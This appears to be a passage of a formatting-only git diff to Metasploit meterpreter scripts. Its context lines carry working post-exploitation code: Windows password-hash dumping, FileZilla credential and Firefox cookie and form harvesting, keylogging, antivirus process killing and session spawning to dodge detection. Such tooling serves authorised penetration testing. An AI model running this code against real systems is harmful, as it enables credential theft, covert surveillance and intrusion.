sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty? - i = 0 + sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty? + i = 0 end end a.delete_if {|x| not x.alive?} while not a.empty? @@ -118,4 +112,4 @@ if client.platform =~ /win32|win64/ else print_error("This version of Meterpreter is not supported with this Script!") raise Rex::Script::Completed -end \ No newline at end of file +end diff --git a/scripts/meterpreter/autoroute.rb b/scripts/meterpreter/autoroute.rb index 55aaaecaad..8fa695edd7 100644 --- a/scripts/meterpreter/autoroute.rb +++ b/scripts/meterpreter/autoroute.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Meterpreter script for setting up a route from within a diff --git a/scripts/meterpreter/checkvm.rb b/scripts/meterpreter/checkvm.rb index 1c2373636c..8f5b68c8cb 100644 --- a/scripts/meterpreter/checkvm.rb +++ b/scripts/meterpreter/checkvm.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # Meterpreter script for detecting if target host is a Virtual Machine # Provided by Carlos Perez at carlos_perez[at]darkoperator.com # Version: 0.2.0 @@ -20,37 +21,38 @@ session = client # Function for detecting if it is a Hyper-V VM def hypervchk(session) - begin - vm = false - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft', KEY_READ) - sfmsvals = key.enum_key - if sfmsvals.include?("Hyper-V") - print_status("This is a Hyper-V Virtual Machine") - vm = true - elsif sfmsvals.include?("VirtualMachine") - print_status("This is a Hyper-V Virtual Machine") - vm = true - end - key.close - rescue - end - if not vm - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ) - srvvals = key.enum_key - if srvvals.include?("vmicheartbeat") + begin + vm = false + key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft', KEY_READ) + sfmsvals = key.enum_key + if sfmsvals.include?("Hyper-V") print_status("This is a Hyper-V Virtual Machine") vm = true - elsif srvvals.include?("vmicvss") - print_status("This is a Hyper-V Virtual Machine") - vm = true - elsif srvvals.include?("vmicshutdown") - print_status("This is a Hyper-V Virtual Machine") - vm = true - elsif srvvals.include?("vmicexchange") + elsif sfmsvals.include?("VirtualMachine") print_status("This is a Hyper-V Virtual Machine") vm = true end + key.close + rescue + end + + if not vm + begin + key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ) + srvvals = key.enum_key + if srvvals.include?("vmicheartbeat") + print_status("This is a Hyper-V Virtual Machine") + vm = true + elsif srvvals.include?("vmicvss") + print_status("This is a Hyper-V Virtual Machine") + vm = true + elsif srvvals.include?("vmicshutdown") + print_status("This is a Hyper-V Virtual Machine") + vm = true + elsif srvvals.include?("vmicexchange") + print_status("This is a Hyper-V Virtual Machine") + vm = true + end rescue end end @@ -81,11 +83,11 @@ def vmwarechk(session) end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0') - if key.query_value('Identifier').data.downcase =~ /vmware/ - print_status("This is a VMware Virtual Machine") - vm = true - end + key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0') + if key.query_value('Identifier').data.downcase =~ /vmware/ + print_status("This is a VMware Virtual Machine") + vm = true + end rescue end end diff --git a/scripts/meterpreter/credcollect.rb b/scripts/meterpreter/credcollect.rb index 5752aafb12..5cf971a954 100644 --- a/scripts/meterpreter/credcollect.rb +++ b/scripts/meterpreter/credcollect.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # credcollect - tebo[at]attackresearch.com opts = Rex::Parser::Arguments.new( diff --git a/scripts/meterpreter/domain_list_gen.rb b/scripts/meterpreter/domain_list_gen.rb index 8eed32031d..4ca6eaf5be 100644 --- a/scripts/meterpreter/domain_list_gen.rb +++ b/scripts/meterpreter/domain_list_gen.rb @@ -32,20 +32,20 @@ host = @client.sys.config.sysinfo['Computer'] current_user = @client.sys.config.getuid.scan(/\S*\\(.*)/) def reg_getvaldata(key,valname) - value = nil - begin - root_key, base_key = @client.sys.registry.splitkey(key) - open_key = @client.sys.registry.open_key(root_key, base_key, KEY_READ) - v = open_key.query_value(valname) - value = v.data - open_key.close - end - return value + value = nil + begin + root_key, base_key = @client.sys.registry.splitkey(key) + open_key = @client.sys.registry.open_key(root_key, base_key, KEY_READ) + v = open_key.query_value(valname) + value = v.data + open_key.close + end + return value end domain = reg_getvaldata("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon","DefaultDomainName") -if domain == "" - print_error("domain not found") +if domain == "" + print_error("domain not found") end # Create Filename info to be appended to downloaded files diff --git a/scripts/meterpreter/duplicate.rb b/scripts/meterpreter/duplicate.rb index 0895dd44b3..fb99634e8d 100644 --- a/scripts/meterpreter/duplicate.rb +++ b/scripts/meterpreter/duplicate.rb @@ -1,9 +1,9 @@ # $Id$ # $Revision$ # Author: Scriptjunkie -# Uses a meterpreter session to spawn a new meterpreter session in a different process. +# Uses a meterpreter session to spawn a new meterpreter session in a different process. # A new process allows the session to take "risky" actions that might get the process killed by -# A/V, giving a meterpreter session to another controller, or start a keylogger on another +# A/V, giving a meterpreter session to another controller, or start a keylogger on another # process. # @@ -83,7 +83,7 @@ if client.platform =~ /win32|win64/ server = client.sys.process.open print_status("Current server process: #{server.name} (#{server.pid})") - + if ! inject exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw) print_status("Meterpreter stager executable #{exe.length} bytes long") diff --git a/scripts/meterpreter/enum_chrome.rb b/scripts/meterpreter/enum_chrome.rb index f988d074f9..7891bc6225 100644 --- a/scripts/meterpreter/enum_chrome.rb +++ b/scripts/meterpreter/enum_chrome.rb @@ -33,7 +33,7 @@ end opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help menu" ], - "-m" => [ false, "Migrate into explorer.exe"], + "-m" => [ false, "Migrate into explorer.exe"], "-f" => [ true, "Output format: j[son], y[aml], t[ext]. Defaults to json"] ) @@ -43,7 +43,7 @@ opts.parse(args) { |opt, idx, val| @migrate = true when "-f" if val =~ /^j(son)?$/ - @output_format << "json" + @output_format << "json" elsif val =~ /^y(aml)?$/ @output_format << "yaml" elsif val =~ /^t(ext)?$/ @@ -71,10 +71,10 @@ if @output_format.include?("json") require 'json' rescue LoadError print_error("JSON is not available.") - @output_format.delete("json") + @output_format.delete("json") if @output_format.empty? print_status("Falling back to raw text output.") - @output_format << "text" + @output_format << "text" end end end @@ -123,7 +123,7 @@ def write_output(file, rows) ::File.open(file + ".yml", "w") { |f| f.write(JSON.pretty_generate(rows)) } end if @output_format.include?("text") - ::File.open(file + ".txt", "w") do |f| + ::File.open(file + ".txt", "w") do |f| f.write(rows.first.keys.join("\t") + "\n") f.write(rows.map { |e| e.values.map(&:inspect).join("\t") }.join("\n")) end diff --git a/scripts/meterpreter/enum_firefox.rb b/scripts/meterpreter/enum_firefox.rb index 2900b1166c..0cc651fc97 100644 --- a/scripts/meterpreter/enum_firefox.rb +++ b/scripts/meterpreter/enum_firefox.rb @@ -1,6 +1,6 @@ # # $Id: enum_firefox.rb 9770 2010-07-10 20:00:32Z darkoperator $ -# $Revision$ +# $Revision: $ # Author: Carlos Perez at carlos_perez[at]darkoperator.com #------------------------------------------------------------------------------- ################## Variable Declarations ################## @@ -52,24 +52,24 @@ def frfxdmp(usrnm) cookies = [] formvals = '' searches = '' - results = '' - placesdb = @logs + ::File::Separator + usrnm + "places.sqlite" - formdb = @logs + ::File::Separator + usrnm + "formhistory.sqlite" - searchdb = @logs + ::File::Separator + usrnm + "search.sqlite" - cookiesdb = @logs + ::File::Separator + usrnm + "cookies.sqlite" + results = '' + placesdb = @logs + ::File::Separator + usrnm + "places.sqlite" + formdb = @logs + ::File::Separator + usrnm + "formhistory.sqlite" + searchdb = @logs + ::File::Separator + usrnm + "search.sqlite" + cookiesdb = @logs + ::File::Separator + usrnm + "cookies.sqlite" bookmarks = @logs + ::File::Separator + usrnm + "_bookmarks.txt" download_list = @logs + ::File::Separator + usrnm + "_download_list.txt" url_history = @logs + ::File::Separator + usrnm + "_history.txt" form_history = @logs + ::File::Separator + usrnm + "_form_history.txt" search_history = @logs + ::File::Separator + usrnm + "_search_history.txt" - begin + begin print_status("\tGetting Firefox Bookmarks for #{usrnm}") db = SQLite3::Database.new(placesdb) #print_status("\tProcessing #{placesdb}") db.execute('select a.url from moz_places a, moz_bookmarks b, '+ - 'moz_bookmarks_roots c where a.id=b.fk and parent=2'+ - ' and folder_id=2 and a.hidden=0')do |row| + 'moz_bookmarks_roots c where a.id=b.fk and parent=2'+ + ' and folder_id=2 and a.hidden=0') do |row| bkmrks << row end print_status("\tSaving to #{bookmarks}") @@ -77,8 +77,8 @@ def frfxdmp(usrnm) bkmrks.each do |b| file_local_write(bookmarks,"\t#{b.to_s}\n") end - else - print_status("\tIt appears that there are no bookmarks for this account") + else + print_status("\tIt appears that there are no bookmarks for this account") end rescue::Exception => e print_status("The following Error was encountered: #{e.class} #{e}") @@ -87,17 +87,17 @@ def frfxdmp(usrnm) begin print_status("\tGetting list of Downloads using Firefox made by #{usrnm}") db.execute('SELECT url FROM moz_places, moz_historyvisits ' + - 'WHERE moz_places.id = moz_historyvisits.place_id '+ - 'AND visit_type = "7" ORDER by visit_date') do |row| + 'WHERE moz_places.id = moz_historyvisits.place_id '+ + 'AND visit_type = "7" ORDER by visit_date') do |row| dnldsmade << row end - print_status("\tSaving Download list to #{download_list}") + print_status("\tSaving Download list to #{download_list}") if dnldsmade.length != 0 dnldsmade.each do |d| file_local_write(download_list,"\t#{d.to_s} \n") end - else - print_status("\tIt appears that downloads where cleared for this account") + else + print_status("\tIt appears that downloads where cleared for this account") end rescue::Exception => e print_status("The following Error was encountered: #{e.class} #{e}") @@ -106,8 +106,8 @@ def frfxdmp(usrnm) begin print_status("\tGetting Firefox URL History for #{usrnm}") db.execute('SELECT DISTINCT url FROM moz_places, moz_historyvisits ' + - 'WHERE moz_places.id = moz_historyvisits.place_id ' + - 'AND visit_type = "1" ORDER by visit_date' ) do |row| + 'WHERE moz_places.id = moz_historyvisits.place_id ' + + 'AND visit_type = "1" ORDER by visit_date' ) do |row| sitesvisited << row end print_status("\tSaving URL History to #{url_history}") @@ -115,8 +115,8 @@ def frfxdmp(usrnm) sitesvisited.each do |s| file_local_write(url_history,"\t#{s.to_s}\n") end - else - print_status("\tIt appears that Browser History has been cleared") + else + print_status("\tIt appears that Browser History has been cleared") end db.close rescue::Exception => e @@ -130,11 +130,11 @@ def frfxdmp(usrnm) db.execute("SELECT fieldname,value FROM moz_formhistory") do |row| formvals << "\tField: #{row[0]} Value: #{row[1]}\n" end - print_status("\tSaving Firefox Form History to #{form_history}") + print_status("\tSaving Firefox Form History to #{form_history}") if formvals.length != 0 file_local_write(form_history,formvals) - else - print_status("\tIt appears that Form History has been cleared") + else + print_status("\tIt appears that Form History has been cleared") end db.close rescue::Exception => e @@ -148,11 +148,11 @@ def frfxdmp(usrnm) db.execute("SELECT name,value FROM engine_data") do |row| searches << "\tField: #{row[0]} Value: #{row[1]}\n" end - print_status("\tSaving Firefox Search History to #{search_history}") + print_status("\tSaving Firefox Search History to #{search_history}") if searches.length != 0 file_local_write(search_history,searches) - else - print_status("\tIt appears that Search History has been cleared") + else + print_status("\tIt appears that Search History has been cleared") end db.close rescue::Exception => e @@ -176,7 +176,7 @@ def frfxdmp(usrnm) fd.puts "isHttpOnly: " + item[8].to_s + "\n" fd.close end - return results + return results end #------------------------------------------------------------------------------- #Function for getting password files diff --git a/scripts/meterpreter/enum_powershell_env.rb b/scripts/meterpreter/enum_powershell_env.rb index 0e516325ae..5ff53f199c 100644 --- a/scripts/meterpreter/enum_powershell_env.rb +++ b/scripts/meterpreter/enum_powershell_env.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision: $ #Meterpreter script for enumerating Microsoft Powershell settings. #Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com @client = client diff --git a/scripts/meterpreter/enum_putty.rb b/scripts/meterpreter/enum_putty.rb index d0c89614bc..76e7994e63 100644 --- a/scripts/meterpreter/enum_putty.rb +++ b/scripts/meterpreter/enum_putty.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision: $ # # Meterpreter script for enumerating putty connections # Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com diff --git a/scripts/meterpreter/enum_vmware.rb b/scripts/meterpreter/enum_vmware.rb index ceeeae8bcb..9fef542251 100644 --- a/scripts/meterpreter/enum_vmware.rb +++ b/scripts/meterpreter/enum_vmware.rb @@ -1,5 +1,6 @@ -# $Id$ +# $Id: $ # $Revision$ + # Author: Carlos Perez at carlos_perez[at]darkoperator.com #------------------------------------------------------------------------------- ################## Variable Declarations ################## @@ -261,7 +262,7 @@ def enum_vihosupdt begin @client.fs.dir.foreach(u['userappdata']+"VIU\\hosts\\") do |vmdir| next if vmdir =~ /^(\.|\.\.)$/ - print_status("\t#{vmdir}") + print_status("\t#{vmdir}") end rescue end diff --git a/scripts/meterpreter/event_manager.rb b/scripts/meterpreter/event_manager.rb index ecaf97b22a..87480062ea 100644 --- a/scripts/meterpreter/event_manager.rb +++ b/scripts/meterpreter/event_manager.rb @@ -89,8 +89,7 @@ def print_log_details tbl = Rex::Ui::Text::Table.new( 'Header' => "Event Logs on System", 'Indent' => 1, - 'Columns' => - [ + 'Columns' => [ "Name", "Retention", "Maximum Size", diff --git a/scripts/meterpreter/get_application_list.rb b/scripts/meterpreter/get_application_list.rb index 6b9cdad99a..bb0cd8fdfa 100644 --- a/scripts/meterpreter/get_application_list.rb +++ b/scripts/meterpreter/get_application_list.rb @@ -1,18 +1,18 @@ # $Id$ +# $Revision: $ # Meterpreter script for listing installed applications and their version. # Provided: carlos_perez[at]darkoperator[dot]com #Options and Option Parsing opts = Rex::Parser::Arguments.new( - "-h" => [ false, "Help menu." ] + "-h" => [ false, "Help menu." ] ) def app_list tbl = Rex::Ui::Text::Table.new( 'Header' => "Installed Applications", 'Indent' => 1, - 'Columns' => - [ + 'Columns' => [ "Name", "Version" ]) @@ -49,13 +49,13 @@ def app_list end opts.parse(args) { |opt, idx, val| - case opt - when "-h" - print_line "Meterpreter Script for extracting a list installed applications and their version." - print_line(opts.usage) - raise Rex::Script::Completed - - end + case opt + when "-h" + print_line "Meterpreter Script for extracting a list installed applications and their version." + print_line(opts.usage) + raise Rex::Script::Completed + + end } if client.platform =~ /win32|win64/ app_list diff --git a/scripts/meterpreter/get_env.rb b/scripts/meterpreter/get_env.rb index 9c5dee59c5..ec7c8a199b 100644 --- a/scripts/meterpreter/get_env.rb +++ b/scripts/meterpreter/get_env.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision: $ #------------------------------------------------------------------------------- #Options and Option Parsing opts = Rex::Parser::Arguments.new( diff --git a/scripts/meterpreter/get_filezilla_creds.rb b/scripts/meterpreter/get_filezilla_creds.rb index 60def76d46..f8213c1ee2 100644 --- a/scripts/meterpreter/get_filezilla_creds.rb +++ b/scripts/meterpreter/get_filezilla_creds.rb @@ -1,5 +1,6 @@ ## # $Id$ +# $Revision: $ ## require "rexml/document" @@ -84,10 +85,10 @@ def extract_saved_creds(path,xml_file) print_status "\tUser: #{e.elements["User"].text}" creds << "User: #{e.elements["User"].text}" print_status "\tPassword: #{e.elements["Pass"].text}" - creds << "Password: #{e.elements["Pass"].text}" + creds << "Password: #{e.elements["Pass"].text}" elsif logon_type =~ /2|3/ - print_status "\tUser: #{e.elements["User"].text}" - creds << "User: #{e.elements["User"].text}" + print_status "\tUser: #{e.elements["User"].text}" + creds << "User: #{e.elements["User"].text}" end proto = e.elements["Protocol"].text diff --git a/scripts/meterpreter/get_local_subnets.rb b/scripts/meterpreter/get_local_subnets.rb index f52f5ee410..dec55fa353 100644 --- a/scripts/meterpreter/get_local_subnets.rb +++ b/scripts/meterpreter/get_local_subnets.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # Meterpreter script that display local subnets # Provided by Nicob @@ -22,9 +23,9 @@ end } client.net.config.each_route { |route| - # Remove multicast and loopback interfaces - next if route.subnet =~ /^(224\.|127\.)/ - next if route.subnet == '0.0.0.0' - next if route.netmask == '255.255.255.255' - print_line("Local subnet: #{route.subnet}/#{route.netmask}") + # Remove multicast and loopback interfaces + next if route.subnet =~ /^(224\.|127\.)/ + next if route.subnet == '0.0.0.0' + next if route.netmask == '255.255.255.255' + print_line("Local subnet: #{route.subnet}/#{route.netmask}") } diff --git a/scripts/meterpreter/get_valid_community.rb b/scripts/meterpreter/get_valid_community.rb old mode 100755 new mode 100644 index 76c6112074..b08df8b9de --- a/scripts/meterpreter/get_valid_community.rb +++ b/scripts/meterpreter/get_valid_community.rb @@ -1,3 +1,6 @@ +# $Id$ +# $Revision$ + #copied getvncpw - thanks grutz/carlos session = client diff --git a/scripts/meterpreter/getcountermeasure.rb b/scripts/meterpreter/getcountermeasure.rb index e0406f1b12..ce0ad27824 100644 --- a/scripts/meterpreter/getcountermeasure.rb +++ b/scripts/meterpreter/getcountermeasure.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration. # Provides also the option to kill the processes of detected products and disable the built-in firewall. @@ -111,9 +112,9 @@ avs = %W{ defwatch.exe f-agnt95.exe fpavupdm.exe - f-prot95.exe - f-prot.exe - fprot.exe + f-prot95.exe + f-prot.exe + fprot.exe fsaua.exe fsav32.exe f-sched.exe @@ -121,7 +122,7 @@ avs = %W{ fsm32.exe fsma32.exe fssm32.exe - f-stopw.exe + f-stopw.exe f-stopw.exe fwservice.exe fwsrv.exe diff --git a/scripts/meterpreter/gettelnet.rb b/scripts/meterpreter/gettelnet.rb index 009fd967f5..a65c4120d0 100644 --- a/scripts/meterpreter/gettelnet.rb +++ b/scripts/meterpreter/gettelnet.rb @@ -40,7 +40,7 @@ end def insttlntsrv() trgtos = @client.sys.config.sysinfo['OS'] if trgtos =~ /Vista|7|2008/ - puts("Checking if Telnet Service is Installed") + print_status("Checking if Telnet Service is Installed") if checkifinst() print_status("Telnet Service Installed on Target") else @@ -52,7 +52,7 @@ def insttlntsrv() @client.sys.process.get_processes().each do |x| found =1 if prog2check == (x['name'].downcase) - puts "*" + print_line "*" sleep(0.5) found = 0 end diff --git a/scripts/meterpreter/hashdump.rb b/scripts/meterpreter/hashdump.rb index 920630c2e5..5b88c13f4e 100644 --- a/scripts/meterpreter/hashdump.rb +++ b/scripts/meterpreter/hashdump.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Implement pwdump (hashdump) through registry reads + syskey @@ -30,22 +31,22 @@ opts.parse(args) { |opt, idx, val| @sam_empty_nt = ["31d6cfe0d16ae931b73c59d7e0c089c0"].pack("H*") @des_odd_parity = [ - 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14, - 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31, - 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47, - 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62, - 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79, - 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94, - 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110, - 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127, - 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143, - 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158, - 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174, - 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191, - 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206, - 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223, - 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239, - 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254 + 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14, + 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31, + 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47, + 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62, + 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79, + 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94, + 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110, + 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127, + 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143, + 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158, + 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174, + 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191, + 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206, + 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223, + 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239, + 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254 ] def capture_boot_key @@ -86,7 +87,7 @@ def capture_hboot_key(bootkey) rc4.key = hash.digest hbootkey = rc4.update(vf[0x80, 32]) hbootkey << rc4.final - return hbootkey + return hbootkey end def capture_user_keys diff --git a/scripts/meterpreter/hostsedit.rb b/scripts/meterpreter/hostsedit.rb index 40f1b1a2bf..f86fe6e5ba 100644 --- a/scripts/meterpreter/hostsedit.rb +++ b/scripts/meterpreter/hostsedit.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # Meterpreter script for modifying the hosts file in windows # given a single entrie or several in a file and clear the # DNS cache on the target machine. diff --git a/scripts/meterpreter/keylogrecorder.rb b/scripts/meterpreter/keylogrecorder.rb index ae8f202f5a..62965a9d27 100644 --- a/scripts/meterpreter/keylogrecorder.rb +++ b/scripts/meterpreter/keylogrecorder.rb @@ -87,7 +87,7 @@ def startkeylogger(session) begin #print_status("Grabbing Desktop Keyboard Input...") #session.ui.grab_desktop - print_status("Starting the keystroke sniffer...") + print_status("Starting the keystroke sniffer...") session.ui.keyscan_start return true rescue diff --git a/scripts/meterpreter/killav.rb b/scripts/meterpreter/killav.rb index bc48fc440f..a631f01f1f 100644 --- a/scripts/meterpreter/killav.rb +++ b/scripts/meterpreter/killav.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Meterpreter script that kills all Antivirus processes # Provided by: Jerome Athias diff --git a/scripts/meterpreter/metsvc.rb b/scripts/meterpreter/metsvc.rb index 5cec941082..f1087e53ac 100644 --- a/scripts/meterpreter/metsvc.rb +++ b/scripts/meterpreter/metsvc.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Meterpreter script for installing the meterpreter service diff --git a/scripts/meterpreter/migrate.rb b/scripts/meterpreter/migrate.rb index 34bacad9fd..e2f42bc739 100644 --- a/scripts/meterpreter/migrate.rb +++ b/scripts/meterpreter/migrate.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Simple example script that migrates to a specific process by name. # This is meant as an illustration. diff --git a/scripts/meterpreter/multi_console_command.rb b/scripts/meterpreter/multi_console_command.rb index d63b5e888c..7fe7850a33 100644 --- a/scripts/meterpreter/multi_console_command.rb +++ b/scripts/meterpreter/multi_console_command.rb @@ -11,10 +11,11 @@ # Setting Arguments @@exec_opts = Rex::Parser::Arguments.new( - "-h" => [ false,"Help menu." ], - "-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."], - "-rc" => [ true,"Text file with list of commands, one per line."] + "-h" => [ false,"Help menu." ], + "-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."], + "-rc" => [ true,"Text file with list of commands, one per line."] ) + #Setting Argument variables commands = [] script = [] @@ -46,30 +47,29 @@ def usage end ################## Main ################## @@exec_opts.parse(args) { |opt, idx, val| - case opt - - when "-cl" - commands = val.split(",") - when "-rc" - script = val - if not ::File.exists?(script) - raise "Command List File does not exists!" - else - ::File.open(script, "r").each_line do |line| - commands << line.chomp - end - end - - when "-h" - help = 1 - end - + case opt + + when "-cl" + commands = val.split(",") + when "-rc" + script = val + if not ::File.exists?(script) + raise "Command List File does not exists!" + else + ::File.open(script, "r").each_line do |line| + commands << line.chomp + end + end + + when "-h" + help = 1 + end } if args.length == 0 or help == 1 usage else - list_con_exec(commands) - raise Rex::Script::Completed + list_con_exec(commands) + raise Rex::Script::Completed end diff --git a/scripts/meterpreter/multicommand.rb b/scripts/meterpreter/multicommand.rb index dc105c0496..707b292bef 100644 --- a/scripts/meterpreter/multicommand.rb +++ b/scripts/meterpreter/multicommand.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ #Meterpreter script for running multiple commands on Windows 2003, Windows Vista # and Windows XP and Windows 2008 targets. #Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com @@ -8,10 +9,10 @@ session = client wininfo = client.sys.config.sysinfo # Setting Arguments @@exec_opts = Rex::Parser::Arguments.new( - "-h" => [ false,"Help menu." ], - "-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."], - "-f" => [ true,"File where to saved output of command."], - "-rc" => [ true,"Text file with list of commands, one per line."] + "-h" => [ false,"Help menu." ], + "-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."], + "-f" => [ true,"File where to saved output of command."], + "-rc" => [ true,"Text file with list of commands, one per line."] ) #Setting Argument variables commands = [] @@ -52,11 +53,11 @@ def list_exec(session,cmdlst) end # Function for writing results of other functions to a file def filewrt(file2wrt, data2wrt) - output = ::File.open(file2wrt, "a") - data2wrt.each_line do |d| - output.puts(d) - end - output.close + output = ::File.open(file2wrt, "a") + data2wrt.each_line do |d| + output.puts(d) + end + output.close end def usage diff --git a/scripts/meterpreter/multiscript.rb b/scripts/meterpreter/multiscript.rb index fbfb18700e..c798ca1452 100644 --- a/scripts/meterpreter/multiscript.rb +++ b/scripts/meterpreter/multiscript.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ #Meterpreter script for running multiple scripts on a Meterpreter Session #Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com #Verion: 0.2 diff --git a/scripts/meterpreter/netenum.rb b/scripts/meterpreter/netenum.rb index e9d33a6f51..fd07509429 100644 --- a/scripts/meterpreter/netenum.rb +++ b/scripts/meterpreter/netenum.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # #Meterpreter script for ping sweeps on Windows 2003, Windows Vista #Windows 2008 and Windows XP targets using native windows commands. @@ -7,16 +8,15 @@ #Note: ################## Variable Declarations ################## @@exec_opts = Rex::Parser::Arguments.new( - "-h" => [ false, "Help menu."], - "-r" => [ true, "The target address range or CIDR identifier"], - "-ps" => [ false, "To Perform Ping Sweep on IP Range"], - "-rl" => [ false, "To Perform DNS Reverse Lookup on IP Range"], - "-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"], - "-hl" => [ true, "File with Host List for DNS Forward Lookup"], - "-d" => [ true, "Domain Name for DNS Forward Lookup"], - "-st" => [ false, "To Perform DNS lookup of MX and NS records for a domain"], - "-sr" => [ false, "To Perform Service Record DNS lookup for a domain"] - + "-h" => [ false, "Help menu."], + "-r" => [ true, "The target address range or CIDR identifier"], + "-ps" => [ false, "To Perform Ping Sweep on IP Range"], + "-rl" => [ false, "To Perform DNS Reverse Lookup on IP Range"], + "-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"], + "-hl" => [ true, "File with Host List for DNS Forward Lookup"], + "-d" => [ true, "Domain Name for DNS Forward Lookup"], + "-st" => [ false, "To Perform DNS lookup of MX and NS records for a domain"], + "-sr" => [ false, "To Perform Service Record DNS lookup for a domain"] ) session = client host,port = session.tunnel_peer.split(':') @@ -44,15 +44,15 @@ def stdlookup(session,domain,dest) results = [] garbage = [] types.each do |t| - begin - r = session.sys.process.execute("nslookup -type=#{t} #{domain}", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - mxout << d - end - r.channel.close - r.close - results = mxout.join.split(/\n/) - results.each do |rec| + begin + r = session.sys.process.execute("nslookup -type=#{t} #{domain}", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + mxout << d + end + r.channel.close + r.close + results = mxout.join.split(/\n/) + results.each do |rec| if rec.match(/\s*internet\saddress\s\=\s/) garbage << rec.split(/\s*internet\saddress\s\=/) print_status("#{garbage[0].join.sub(" "," ")} #{t} ") @@ -60,13 +60,14 @@ def stdlookup(session,domain,dest) garbage.clear end garbage.clear + end + + rescue ::Exception => e + print_status("The following Error was encountered: #{e.class} #{e}") end - - rescue ::Exception => e - print_status("The following Error was encountered: #{e.class} #{e}") - end end end + #------------------------------------------------------------------------------- # Function for writing results of other functions to a file def filewrt(file2wrt, data2wrt) @@ -76,6 +77,7 @@ def filewrt(file2wrt, data2wrt) end output.close end + #------------------------------------------------------------------------------- # Function for Executing Reverse lookups def reverselookup(session,iprange,dest) @@ -86,49 +88,50 @@ def reverselookup(session,iprange,dest) i, a = 0, [] begin ipadd = Rex::Socket::RangeWalker.new(iprange) - numip = ipadd.num_ips - while (iplst.length < numip) - ipa = ipadd.next_ip - if (not ipa) - break - end - iplst << ipa - end + numip = ipadd.num_ips + while (iplst.length < numip) + ipa = 